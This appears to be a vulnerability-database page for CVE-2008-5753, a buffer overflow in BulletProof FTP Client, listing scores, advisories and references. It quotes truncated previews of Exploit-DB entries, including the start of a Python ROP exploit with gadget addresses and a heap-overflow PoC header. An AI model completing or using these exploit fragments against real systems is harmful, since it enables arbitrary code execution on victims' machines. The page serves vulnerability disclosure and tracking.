CVE-2008-5753
published 2008-12-30CVE-2008-5753: Stack-based buffer overflow in BulletProof FTP Client 2.63 and 2010 allows user-assisted attackers to execute arbitrary code via a bookmark file entry with a…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.47%
93.7th percentile
Stack-based buffer overflow in BulletProof FTP Client 2.63 and 2010 allows user-assisted attackers to execute arbitrary code via a bookmark file entry with a long host name, which appears as a host parameter within the quick-connect bar.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bpftp | bulletproof_ftp_client | — | — |
| bpftp | bulletproof_ftp_client | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8qrp-vpc4-vphf: Stack-based buffer overflow in BulletProof FTP Client 2
ghsa_unreviewed·2022-05-17
CVE-2008-5753 [HIGH] CWE-119 GHSA-8qrp-vpc4-vphf: Stack-based buffer overflow in BulletProof FTP Client 2
Stack-based buffer overflow in BulletProof FTP Client 2.63 and 2010 allows user-assisted attackers to execute arbitrary code via a bookmark file entry with a long host name, which appears as a host parameter within the quick-connect bar.
GHSA
GHSA-fmm9-vhfj-rm44: Stack-based buffer overflow in BulletProof FTP Client allows user-assisted attackers to execute arbitrary code via a
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2008-5754 [CRITICAL] CWE-119 GHSA-fmm9-vhfj-rm44: Stack-based buffer overflow in BulletProof FTP Client allows user-assisted attackers to execute arbitrary code via a
Stack-based buffer overflow in BulletProof FTP Client allows user-assisted attackers to execute arbitrary code via a .bps file (aka Session-File) with a long second line, possibly a related issue to CVE-2008-5753.
No detection rules found.
Exploit-DB
BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
exploitdb·2015-05-18·CVSS 9.3
CVE-2008-5753 [CRITICAL] BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
---
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L'
Exploit-DB
BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)
exploitdb·2008-12-24
CVE-2008-5753 BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)
BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)
---
#!/usr/bin/python
#
#
# ------ | ______ _____ (--, __*__ ______
# |____| | | | | | ! ) | | |
# [ | |` | | <> | |-----> |__/ | | | ]
# | .. | |____! |____| |____ |\ | |-----|
# | _| \ ----- | ::: |
# | | \
# |_____| | \
# |
# |
# ,|.
# / | \
# | | |
# | _ |
# `._\/.\/_,'
# _( 8 )_
# / '_ _' \
# | /{_}\ |
# ` | " | `
# | |
#
#
# [+] Application : BulletProof FTP (Client) V2.63
#
# [+] Vendor URL : http://www.bpftp.com/
#
# [+] Bug : BulletProof FTP Client Local Heap Overflow (PoC)
#
# [+] Author : His0k4
#
# [+] Greetings : All friends & Muslims Hackers (dz)
#---------------------------------------------------------------------------------
# EAX 41414141
# ECX 016EC370
# EDX 00000000
# EBX 41414141
# ESP 0012F548
# EBP 0012F5C4 AS
No writeups or analysis indexed.
http://osvdb.org/50968http://packetstormsecurity.com/files/131965/BulletProof-FTP-Client-2010-Buffer-Overflow.htmlhttp://secunia.com/advisories/33322http://securityreason.com/securityalert/4835http://www.kb.cert.org/vuls/id/565580http://www.securityfocus.com/bid/33007https://www.exploit-db.com/exploits/37056/https://www.exploit-db.com/exploits/7571http://osvdb.org/50968http://packetstormsecurity.com/files/131965/BulletProof-FTP-Client-2010-Buffer-Overflow.htmlhttp://secunia.com/advisories/33322http://securityreason.com/securityalert/4835http://www.kb.cert.org/vuls/id/565580http://www.securityfocus.com/bid/33007https://www.exploit-db.com/exploits/37056/https://www.exploit-db.com/exploits/7571
2008-12-30
Published